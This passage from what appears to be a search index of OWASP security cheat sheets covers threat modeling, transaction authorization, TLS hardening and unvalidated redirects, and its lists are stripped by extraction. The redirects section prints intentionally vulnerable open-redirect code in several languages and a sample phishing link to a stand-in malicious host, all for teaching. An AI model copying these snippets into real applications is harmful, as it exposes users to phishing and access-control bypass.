  3. Risks with SANS Top 25.
  4. Microsoft STRIDE.
  5. Continuous Threat Modeling CTM.
"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#map-threat-agents-to-application-entry-points","title":"Map Threat agents to application Entry points","text":"

Map threat agents to the application entry point, whether it is a login process, a registration process or whatever it might be and consider insider Threats.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#draw-attack-vectors-and-attacks-tree","title":"Draw attack vectors and attacks tree","text":"

During this phase conduct the following activities:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#mapping-abuse-cases-to-use-cases","title":"Mapping Abuse Cases to Use Cases","text":"

This is a very important step that can help identifying application logical threats. List of all possible abuse cases should be developed for each application use case. Being familiar with the types of application logical attack is an important during the mapping process. You can refer to OWASP Testing Guide 4.0: Business Logic Testing and OWASP ASVS for more details.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#re-define-attack-vectors","title":"Re-Define attack vectors","text":"

In most cases after defining the attack vectors, the compromised user role could lead to further attacks into the application. For example, assuming that an internet banking user credentials could be compromised, the user of this cheat sheet has to then redefine the attack vectors that could result from compromising the user\u2019s credentials and so on.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#write-your-threat-traceability-matrix","title":"Write your Threat traceability matrix","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-the-impact-and-probability-for-each-threat","title":"Define the Impact and Probability for each threat","text":"

Enumerate Attacks posed by the most dangerous attacker in designated areas of the logical and physical maps of the target of evaluation.

Assume the attacker has a zero-day because he does. In this methodology, we assume compromise; because a zero-day will exist or already does exist (even if we don't know about it). This is about what can be done by skilled attackers, with much more time, money, motive and opportunity that we have.

Use risk management methodology to determine the risk behind the threat

Create risks in risk log for every identified threat or attack to any assets. A risk assessment methodology is followed in order to identify the risk level for each vulnerability and hence for each server.

Here we will highlight two risk methodology that could be used:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#dread","title":"DREAD","text":"

DREAD, is about evaluating each existing vulnerability using a mathematical formula to retrieve the vulnerability\u2019s corresponding risk. The DREAD formula is divided into 5 main categories:

DREAD formula is:

Risk Value = (Damage + Affected users) x (Reproducibility + Exploitability + Discoverability).

Then the risk level is determined using defined thresholds below.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#pasta","title":"PASTA","text":"

PASTA, Attack Simulation & Threat Analysis (PASTA) is a complete methodology to perform application threat modeling. PASTA introduces a risk-centric methodology aimed at applying security countermeasures that are commensurate to the possible impact that could be sustained from defined threat models, vulnerabilities, weaknesses, and attack patterns.

PASTA introduces a complete risk analysis and evaluation procedures that you can follow to evaluate the risk for each of the identified threat. The main difference in using PASTA Approach is that you should evaluate the impact early on in the analysis phase instead of addressing the impact at the step of evaluating the risk.

The idea behind addressing the impact earlier in PASTA approach is that the audience that knows impact knows the consequences on a product or use case failures more than participants in the threat analysis phase.

Application security risk assessments are not enough because they are very binary and leverage a control framework basis for denoting risks. It is recommended to contextually look at threats impacts, probability and effectiveness of countermeasures that may be present.

R = (TVP*I) / Countermeasures

For more details about PASTA.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#rank-risks","title":"Rank Risks","text":"

Using risk matrix rank risks from most severe to least severe based on Means, Motive & Opportunity. Below is a sample risk matrix table, depending on your risk approach you can define different risk ranking matrix:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#determine-countermeasures-and-mitigation","title":"Determine countermeasures and mitigation","text":"

Identify risk owners and agree on risk mitigation with risk owners and stakeholders. Provide the needed controls in forms of code upgrades and configuration updates to reduce risks to acceptable levels.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-risk-owners","title":"Identify risk owners","text":"

For the assessors: After defining and analyzing the risks, the assessor should be working on the mitigation plan by firstly identifying risk owners which is the personnel that is responsible for mitigating the risk. i.e. one of the information security team or the development team.

For the designers or the architects: they should assign the risk mitigation to the development team to consider it while building the application.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#agree-on-risk-mitigation-with-risk-owners-and-stakeholders","title":"Agree on risk mitigation with risk owners and stakeholders","text":"

After identifying the risk owners, it is important to review the mitigation controls for each of the identified risks. Some controls might be inapplicable, you should propose other mitigation controls or discuss with the risk owners the possible compensation controls.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#build-your-risk-treatment-strategy","title":"Build your risk treatment strategy","text":"

For the assessor, this is considered as the last step in the assessment process. The following steps should be conducted by the risk owner, however, the assessor shall engage in 6.5 (Testing risk treatment) to verify the remediation.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#select-appropriate-controls-to-mitigate-the-risk","title":"Select appropriate controls to mitigate the risk","text":"

Selecting one of the controls to reduce the risk, either by upgrading the code, or building a specific configuration during the deployment phase and so on.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#test-risk-treatment-to-verify-remediation","title":"Test risk treatment to verify remediation","text":"

Mitigation controls will not vanish the risk completely, rather, it would just reduce the risk. In this case, the user of this cheat sheet should measure the value of the risk after applying the mitigation controls. The value of the risk should be reduced to the acceptable criteria set earlier.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#reduce-risk-in-risk-log-for-verified-treated-risk","title":"Reduce risk in risk log for verified treated risk","text":"

After applying the mitigation and measuring the new risk value, the user of this cheat sheet should update the risk log to verify that risk has been reduced.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#periodically-retest-risk","title":"Periodically retest risk","text":"

Application threat modeling is an ongoing process, in addition to the changes that might be happened to the application that may require re-evaluating the expected threats, it is also important to do periodic retest for the identified risks and the implemented risk treatments.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#appendix","title":"Appendix","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html","title":"Transaction Authorization Cheat Sheet","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#purpose-and-audience","title":"Purpose and audience","text":"

The Purpose of this cheat sheet is to provide guidelines on how to securely implement transaction authorization to protect it from being bypassed. These guidelines can be used by:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Some applications use a second factor to check whether an authorized user is performing sensitive operations. A common example is wire transfer authorization, typically used in online or mobile banking applications.

For the purpose of this document we will call that process: transaction authorization.

Usage scenarios are not only limited to financial systems. For example: an email with a secret code or a link with some kind of token to unlock a user account is also a special case of transaction authorization. A user authorizes the operation of account unlocking by using a second factor (a unique code sent to his email address). Transaction authorization can be implemented using various methods, e.g.:

Some of these can be implemented on a physical device or in a mobile application.

Transaction authorization is implemented in order to protect for unauthorized wire transfers as a result of attacks using malware, phishing, password or session hijacking, CSRF, XSS, etc.. Unfortunately, as with any piece of code, this protection can be improperly implemented and as a result it might be possible to bypass this safeguard.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#1-functional-guidelines","title":"1. Functional Guidelines","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#11-transaction-authorization-method-has-to-allow-a-user-to-identify-and-acknowledge-significant-transaction-data","title":"1.1 Transaction authorization method has to allow a user to identify and acknowledge significant transaction data","text":"

User's computers cannot be trusted due to malware threats. Hence a method that prevents a user from identifying transaction on an external device cannot be considered as secure. Transaction data should be presented and acknowledged using an external authorization component.

Such transaction authorization components should be built using the What You See Is What You Sign principle. When a user authorizes a transaction they need to know what they are authorizing. Based on this principle, an authorization method must permit a user to identify and acknowledge the data that is significant to a given transaction. For example, in the case of a wire transfer: the target account and amount.

The decision about which transaction data can be considered as significant should be chosen based on:

For example when an SMS message is used to send significant transaction data, it is possible to send the target account, amount and type of transfer. However, for an unconnected CAP reader it is perceived to be inconvenient for a user to enter these data. In such cases, entering only the most significant transaction data (e.g. partial target account number and amount) can be considered sufficient.

In general, significant transaction data should always be presented as an inherent part of the transaction authorization process. Whereas the user experience should be designed to encourage users to verify the transaction data.

If a transaction process requires a user to enter transaction data into an external device, the user should be prompted for providing specific value (e.g. a target account number). Entering a value without meaningful prompt could be easily abused by malware using social engineering techniques as described in the example in paragraph 1.4. Also, for more detailed discussion of input overloading problems, see here.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#12-change-of-authorization-token-should-be-authorized-using-the-current-authorization-token","title":"1.2 Change of authorization token should be authorized using the current authorization token","text":"

When a user is allowed to change authorization token by using the application interface, the operation should be authorized by using his current authorization credentials (as is the case with password change procedure). For example: when a user changes a phone number for SMS codes an authorization SMS code should be sent to the current phone number.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#13-change-of-authorization-method-should-be-authorized-using-the-current-authorization-method","title":"1.3 Change of authorization method should be authorized using the current authorization method","text":"

Some applications allow a user to chose between multiple methods of transaction authorization. In such cases, the user should authorize the change in authorization method using his current authorization method. Otherwise, malware may change the authorization method to the most vulnerable method.

Additionally, the application should inform the user about the potential dangers associated to the selected authorization method.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#14-users-should-be-able-to-easily-distinguish-the-authentication-process-from-the-transaction-authorization-process","title":"1.4 Users should be able to easily distinguish the authentication process from the transaction authorization process","text":"

Malware can trick users in authorizing fraudulent operations, when an application requires a user to perform the same actions for authentication as for transaction authorization. Consider the following example:

In the abovementioned scenario, the same method was used to authenticate the user and to authorize the transaction. Malware can abuse this behavior to extract transaction authorization credentials without the user's knowledge. Social engineering methods can be used despite utilized authentication and operation authorization methods but the application shouldn't simplify such attack scenarios.

Safeguards should allow the user to easily distinguish authentication from transaction authorization. This could be achieved by:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#15-each-transaction-should-be-authorized-using-unique-authorization-credentials","title":"1.5 Each transaction should be authorized using unique authorization credentials","text":"

Some applications are asking for transaction authorization credentials only once, e.g. static password, code sent through SMS, token response. Afterwards a user is able to authorize any transaction during the whole user's session or at least they have to reuse the same credentials each time they need to authorize a transaction. Such behavior is not sufficient to prevent malware attacks because malware will sniff such credentials and use them to authorize any transaction without the user's knowledge.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#2-non-functional-guidelines","title":"2. Non-functional guidelines","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#21-authorization-should-be-performed-and-enforced-server-side","title":"2.1 Authorization should be performed and enforced server-side","text":"

As for all other security controls transaction authorization should be enforced server-side. By no means it should be possible to influence the authorization result by altering data which flows from a client to a server, e.g. by:

To achieve this, security programming best practices should be applied, such as:

To avoid tampering, additional safeguards should be considered. For example by cryptographically protecting the data for confidentiality and integrity and while decrypting and verifying the data server side.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#22-authorization-method-should-be-enforced-server-side","title":"2.2 Authorization method should be enforced server side","text":"

When multiple transaction authorization methods are available to the user. The server should enforce the use of the current authorization method chosen by the user in the application settings or enforced by application policies. It should be impossible to change an authorization method by manipulating the parameters provided from the client. Otherwise, malware can downgrade an authorization method to a less or even the least secure authorization method.

This is especially important when an application is developed to add a new, more secure authorization method. It is not very rare,that a new authorization method is built on top of an old codebase. As a result, when a client is sending parameters using the old method, the transaction may be authorized, despite the fact that the user has already switched to a new method.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#23-transaction-verification-data-should-be-generated-server-side","title":"2.3 Transaction verification data should be generated server-side","text":"

When significant transaction data are transmitted programmatically to an authorization component, extra care should be put into denying client modifications on the transaction data at authorization. Significant transaction data that has to be verified by the user, should be generated and stored on a server, then passed to an authorization component without any possibility of tampering by the client.

A common anti pattern is to collect significant transaction data client-side and pass it to the server. In such cases, malware can manipulate these data and as a result, show faked transaction data in an authorization component.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#24-application-should-prevent-authorization-credentials-brute-forcing","title":"2.4 Application should prevent authorization credentials brute-forcing","text":"

When transaction authorization credentials are sent to the server for verification, an application has to prevent brute-forcing. The transaction authorization process must be restarted after number of failed authorization attempts. In addition other anti brute-forcing and anti-automation techniques should be considered to prevent an attacker from automating his attacks,see OWASP Authentication Cheat Sheet.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#25-application-should-control-which-transaction-state-transitions-are-allowed","title":"2.5 Application should control which transaction state transitions are allowed","text":"

Transaction authorization is usually performed in multiple steps, e.g.:

  1. The user enters the transaction data.
  2. The user requests authorization.
  3. The application initializes an authorization mechanism.
  4. The user verifies/confirms the transaction data.
  5. The user responds with the authorization credentials.
  6. The application validates authorization and executes a transaction.

An application should process such business logic flow in sequential step order and preventing a user from performing these steps out of order or in even skipping any of these steps (see OWASP ASVS requirement 15.1).

This should protect against attack techniques such as:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#26-transaction-data-should-be-protected-against-modification","title":"2.6 Transaction data should be protected against modification","text":"

The transaction authorization process should protect against attack scenarios that modify transaction data after the initial entry by the user. For example, a bad implementation of a transaction authorization process may allow the following attacks (for reference, see steps of transaction authorization described in paragraph 2.5):

The protection against modification could be implemented using various techniques depending on the framework used, but one or more of the following should be present:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#27-confidentiality-of-the-transaction-data-should-be-protected-during-any-client-server-communications","title":"2.7 Confidentiality of the transaction data should be protected during any client / server communications","text":"

The transaction authorization process should protect the privacy of transaction data being presented to the user to authorize i.e. at section 2.5, steps 2 and 4.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#28-when-a-transaction-is-executed-the-system-should-check-whether-it-was-authorized","title":"2.8 When a transaction is executed, the system should check whether it was authorized","text":"

The result of the transaction entry and the authorization process described in paragraph 2.5 is the transaction execution. Just before the transaction is executed there should be a final control gate which verifies whether the transaction was properly authorized by the user. Such control, tied to execution, should prevent attacks such as:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#29-authorization-credentials-should-be-valid-only-by-limited-period-of-time","title":"2.9 Authorization credentials should be valid only by limited period of time","text":"

In some malware attacks scenarios, authorization credentials entered by the user is passed to malware command and control server (C&C) and then used from an attacker-controlled machine. Such a process is often performed manually by an attacker. To make such attacks difficult, the server should allow authorizing the transaction only in a limited time window between generating of challenge or OTP and the transaction authorization. Additionally, such safeguard will also aid in preventing resource exhaustion attacks. The time window should be carefully selected to not disrupt normal users' behavior.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#210-authorization-credentials-should-be-unique-for-every-operation","title":"2.10 Authorization credentials should be unique for every operation","text":"

To prevent all sorts of replay attacks, authorization credentials should be unique for every operation. It could be achieved using different methods depending on the applied transaction authorization mechanism. For example: using a timestamp, a sequence number or a random value in signed transaction data or as a part of a challenge.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#remarks","title":"Remarks","text":"

We identify other issues that should be taken into consideration while implementing transaction authorization. However we deem to be beyond the scope of this cheat sheet:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#references-and-future-reading","title":"References and future reading","text":"

References and future reading:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html","title":"Transport Layer Protection Cheat Sheet","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance on how to implement transport layer protection for an application using Transport Layer Security (TLS). When correctly implemented, TLS can provides a number of security benefits:

TLS is used by many other protocols to provide encryption and integrity, and can be used in a number of different ways. This cheatsheet is primarily focused on how to use TLS to protect clients connecting to a web application over HTTPS; although much of the guidance is also applicable to other uses of TLS.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#ssl-vs-tls","title":"SSL vs TLS","text":"

Secure Socket Layer (SSL) was the original protocol that was used to provide encryption for HTTP traffic, in the form of HTTPS. There were two publicly released versions of SSL - versions 2 and 3. Both of these have serious cryptographic weaknesses and should no longer be used.

For various reasons the next version of the protocol (effectively SSL 3.1) was named Transport Layer Security (TLS) version 1.0. Subsequently TLS versions 1.1, 1.2 and 1.3 have been released.

The terms \"SSL\", \"SSL/TLS\" and \"TLS\" are frequently used interchangeably, and in many cases \"SSL\" is used when referring to the more modern TLS protocol. This cheatsheet will use the term \"TLS\" except where referring to the legacy protocols.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#server-configuration","title":"Server Configuration","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#only-support-strong-protocols","title":"Only Support Strong Protocols","text":"

The SSL protocols have a large number of weaknesses, and should not be used in any circumstances. General purpose web applications should default to TLS 1.3 (support TLS 1.2 if necessary) with all other protocols disabled. Where it is known that a web server must support legacy clients with unsupported an insecure browsers (such as Internet Explorer 10), it may be necessary to enable TLS 1.0 to provide support.

Where legacy protocols are required, the \"TLS_FALLBACK_SCSV\" extension should be enabled in order to prevent downgrade attacks against clients.

Note that PCI DSS forbids the use of legacy protocols such as TLS 1.0.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#only-support-strong-ciphers","title":"Only Support Strong Ciphers","text":"

There are a large number of different ciphers (or cipher suites) that are supported by TLS, that provide varying levels of security. Where possible, only GCM ciphers should be enabled. However, if it is necessary to support legacy clients, then other ciphers may be required.

At a minimum, the following types of ciphers should always be disabled:

See the TLS Cipher String Cheat Sheet for full details on securely configuring ciphers.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-diffie-hellman-parameters","title":"Use Strong Diffie-Hellman Parameters","text":"

Where ciphers that use the ephemeral Diffie-Hellman key exchange are in use (signified by the \"DHE\" or \"EDH\" strings in the cipher name) sufficiently secure Diffie-Hellman parameters (at least 2048 bits) should be used

The following command can be used to generate 2048 bit parameters:

openssl dhparam 2048 -out dhparam2048.pem\n

The Weak DH website provides guidance on how various web servers can be configured to use these generated parameters.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#disable-compression","title":"Disable Compression","text":"

TLS compression should be disabled in order to protect against a vulnerability (nicknamed CRIME) which could potentially allow sensitive information such as session cookies to be recovered by an attacker.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#patch-cryptographic-libraries","title":"Patch Cryptographic Libraries","text":"

As well as the vulnerabilities in the SSL and TLS protocols, there have also been a large number of historic vulnerability in SSL and TLS libraries, with Heartbleed being the most well known. As such, it is important to ensure that these libraries are kept up to date with the latest security patches.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#test-the-server-configuration","title":"Test the Server Configuration","text":"

Once the server has been hardened, the configuration should be tested. The OWASP Testing Guide chapter on SSL/TLS Testing contains further information on testing.

There are a number of online tools that can be used to quickly validate the configuration of a server, including:

Additionally, there are a number of offline tools that can be used:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#certificates","title":"Certificates","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-keys-and-protect-them","title":"Use Strong Keys and Protect Them","text":"

The private key used to generate the cipher key must be sufficiently strong for the anticipated lifetime of the private key and corresponding certificate. The current best practice is to select a key size of at least 2048 bits. Additional information on key lifetimes and comparable key strengths can be found here and in NIST SP 800-57.

The private key should also be protected from unauthorized access using filesystem permissions and other technical and administrative controls.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-cryptographic-hashing-algorithms","title":"Use Strong Cryptographic Hashing Algorithms","text":"

Certificates should use SHA-256 for the hashing algorithm, rather than the older MD5 and SHA-1 algorithms. These have a number of cryptographic weaknesses, and are not trusted by modern browsers.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-correct-domain-names","title":"Use Correct Domain Names","text":"

The domain name (or subject) of the certificate must match the fully qualified name of the server that presents the certificate. Historically this was stored in the commonName (CN) attribute of the certificate. However, modern versions of Chrome ignore the CN attribute, and require that the FQDN is in the subjectAlternativeName (SAN) attribute. For compatibility reasons, certificates should have the primary FQDN in the CN, and the full list of FQDNs in the SAN.

Additionally, when creating the certificate, the following should be taken into account:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#carefully-consider-the-use-of-wildcard-certificates","title":"Carefully Consider the use of Wildcard Certificates","text":"

Wildcard certificates can be convenient, however they violate the principal of least privilege, as a single certificate is valid for all subdomains of a domain (such as *.example.org). Where multiple systems are sharing a wildcard certificate, the likelihood that the private key for the certificate is compromised increases, as the key may be present on multiple systems. Additionally, the value of this key is significantly increased, making it a more attractive target for attackers.

The issues around the use of wildcard certificates are complicated, and there are various other discussions of them online.

When risk assessing the use of wildcard certificates, the following areas should be considered:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-an-appropriate-certification-authority-for-the-applications-user-base","title":"Use an Appropriate Certification Authority for the Application's User Base","text":"

In order to be trusted by users, certificates must be signed by a trusted certificate authority (CA). For Internet facing applications, this should be one of the CAs which are well-known and automatically trusted by operating systems and browsers.

The LetsEncrypt CA provides free domain validated SSL certificates, which are trusted by all major browsers. As such, consider whether there are any benefits to purchasing a certificate from a CA.

For internal applications, an internal CA can be used. This means that the FQDN of the certificate will not be exposed (either to an external CA, or publicly in certificate transparency lists). However, the certificate will only be trusted by users who have imported and trusted the internal CA certificate that was used to sign them.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-caa-records-to-restrict-which-cas-can-issue-certificates","title":"Use CAA Records to Restrict Which CAs can Issue Certificates","text":"

Certification Authority Authorization (CAA) DNS records can be used to define which CAs are permitted to issue certificates for a domain. The records contains a list of CAs, and any CA who is not included in that list should refuse to issue a certificate for the domain. This can help to prevent an attacker from obtaining unauthorized certificates for a domain through a less-reputable CA. Where it is applied to all subdomains, it can also be useful from an administrative perspective by limiting which CAs administrators or developers are able to use, and by preventing them from obtaining unauthorized wildcard certificates.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#always-provide-all-needed-certificates","title":"Always Provide All Needed Certificates","text":"

In order to validate the authenticity of a certificate, the user's browser must examine the certificate that was used to sign it and compare it to the list of CAs trusted by their system. In many cases the certificate is not directly signed by a root CA, but is instead signed by an intermediate CA, which is in turn signed by the root CA.

If the user does not know or trust this intermediate CA then the certificate validation will fail, even if the user trusts the ultimate root CA, as they cannot establish a chain of trust between the certificate and the root. In order to avoid this, any intermediate certificates should be provided alongside the main certificate.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-the-use-of-extended-validation-certificates","title":"Consider the use of Extended Validation Certificates","text":"

Extended validation (EV) certificates claim to provide a higher level of verification of the entity, as they perform checks that the requestor is a legitimate legal entity, rather than just verifying the ownership of the domain name like normal (or \"Domain Validated\") certificates. This can effectively be viewed as the difference between \"This site is really run by Example Company Inc.\" vs \"This domain is really example.org\".

Historically these displayed differently in the browser, often showing the company name or a green icon or background in the address bar. However, as of 2019 both Chrome and Firefox have announced that they will be removing these indicators, as they do not believe that EV certificates provide any additional protection.

There is no security downside to the use of EV certificates. However, as they are significantly more expensive than domain validated certificates, an assessment should be made to determine whether they provide any additional value

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#application","title":"Application","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-tls-for-all-pages","title":"Use TLS For All Pages","text":"

TLS should be used for all pages, not just those that are considered sensitive such as the login page. If there are any pages that do not enforce the use of TLS, these could give an attacker an opportunity to sniff sensitive information such as session tokens, or to inject malicious JavaScript into the responses to carry out other attacks against the user.

For public facing applications, it may be appropriate to have the web server listening for unencrypted HTTP connections on port 80, and then immediately redirecting them with a permanent redirect (HTTP 301) in order to provide a better experience to users who manually type in the domain name. This should then be supported with the HTTP Strict Transport Security (HSTS) header to prevent them accessing the site over HTTP in the future.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#do-not-mix-tls-and-non-tls-content","title":"Do Not Mix TLS and Non-TLS Content","text":"

A page that is available over TLS should not include any resources (such as JavaScript or CSS) files which are loaded over unencrypted HTTP. These unencrypted resources could allow an attacker to sniff session cookies or inject malicious code into the page. Modern browsers will also block attempts to load active content over unencrypted HTTP into secure pages.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-the-secure-cookie-flag","title":"Use the \"Secure\" Cookie Flag","text":"

All cookies should be marked with the \"Secure\" attribute, which instructs the browser to only send them over encrypted HTTPS connections, in order to prevent them from being sniffed from an unencrypted HTTP connection. This is important even if the website does not listen on HTTP (port 80), as an attacker performing an active man in the middle attack could present a spoofed webserver on port 80 to the user in order to steal their cookie.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#prevent-caching-of-sensitive-data","title":"Prevent Caching of Sensitive Data","text":"

Although TLS provides protection of data while it is in transit, it does not provide any protection for data once it has reached the requesting system. As such, this information may be stored in the cache of the user's browser, or by any intercepting proxies which are configured to perform TLS decryption.

Where sensitive data is returned in responses, HTTP headers should be used to instruct the browser and any proxy servers not to cache the information, in order to prevent it being stored or returned to other users. This can be achieved by setting the following HTTP headers in the response:

Cache-Control: no-cache, no-store, must-revalidate\nPragma: no-cache\nExpires: 0\n
"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-http-strict-transport-security","title":"Use HTTP Strict Transport Security","text":"

HTTP Strict Transport Security (HSTS) instructs the user's browser to always request the site over HTTPS, and also prevents the user from bypassing certificate warnings. See the HTTP Strict Transport Security cheatsheet for further information on implementing HSTS.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-the-use-of-client-side-certificates","title":"Consider the use of Client-Side Certificates","text":"

In a typical configuration, TLS is used with a certificate on the server so that the client is able to verify the identity of the server, and to provide an encrypted connection between them. However, there are two main weaknesses with this approach:

Client certificates address both of these issues by requiring that the client proves their identity to the server with their own certificate. This not only provides strong authentication of the identity of the client, but also prevents an intermediate party from performing TLS decryption, even if they have trusted CA certificate on the client system.

Client certificates are rarely used on public systems due to a number of issues:

However, they should be considered for high-value applications or APIs, especially where there are a small number of technically sophisticated users, or where all users are part of the same organisation.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-using-public-key-pinning","title":"Consider Using Public Key Pinning","text":"

Public key pinning can be used to provides assurance that the server's certificate is not only valid and trusted, but also that it matches the certificate expected for the server. This provides protection against an attacker who is able to obtain a valid certificate, either by exploiting a weakness in the validation process, compromising a trusted certificate authority, or having administrative access to the client.

Public key pinning was added to browsers in the HTTP Public Key Pinning (HPKP) standard. However, due to a number of issues, it has subsequently been deprecated and is no longer recommended or supported by modern browsers.

However, public key pinning can still provide security benefits for mobile applications, thick clients and server-to-server communication. This is discussed in further detail in the Pinning Cheat Sheet.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html","title":"Unvalidated Redirects and Forwards Cheat Sheet","text":""},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application's access control check and then forward the attacker to privileged functions that they would normally not be able to access.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#safe-url-redirects","title":"Safe URL Redirects","text":"

When we want to redirect a user automatically to another page (without an action of the visitor such as clicking on a hyperlink) you might implement a code such as the following:

Java

response.sendRedirect(\"http://www.mysite.com\");\n

PHP

<?php\n/*\u00a0Redirect\u00a0browser\u00a0*/\nheader(\"Location:\u00a0http://www.mysite.com\");\n/* Exit to prevent the rest of the code from executing */\nexit;\n?>\n

ASP .NET

Response.Redirect(\"~/folder/Login.aspx\")\n

Rails

redirect_to\u00a0login_path\n

Rust actix web

  Ok(HttpResponse::Found()\n.insert_header((header::LOCATION, \"https://mysite.com/\"))\n.finish())\n

In the examples above, the URL is being explicitly declared in the code and cannot be manipulated by an attacker.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirects","title":"Dangerous URL Redirects","text":"

The following examples demonstrate unsafe redirect and forward code.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirect-example-1","title":"Dangerous URL Redirect Example 1","text":"

The following Java code receives the URL from the parameter named url (GET or POST) and redirects to that URL:

response.sendRedirect(request.getParameter(\"url\"));\n

The following PHP code obtains a URL from the query string (via the parameter named url) and then redirects the user to that URL. Additionally, the PHP code after this header() function will continue to execute, so if the user configures their browser to ignore the redirect, they may be able to access the rest of the page.

$redirect_url\u00a0=\u00a0$_GET['url'];\nheader(\"Location:\u00a0\"\u00a0.\u00a0$redirect_url);\n

A similar example of C# .NET Vulnerable Code:

string\u00a0url\u00a0=\u00a0request.QueryString[\"url\"];\nResponse.Redirect(url);\n

And in Rails:

redirect_to\u00a0params[:url]\n

Rust actix web

  Ok(HttpResponse::Found()\n.insert_header((header::LOCATION, query_string.path.as_str()))\n.finish())\n

The above code is vulnerable to an attack if no validation or extra method controls are applied to verify the certainty of the URL. This vulnerability could be used as part of a phishing scam by redirecting users to a malicious site.

If no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website, for example:

 http://example.com/example.php?url=http://malicious.example.com\n

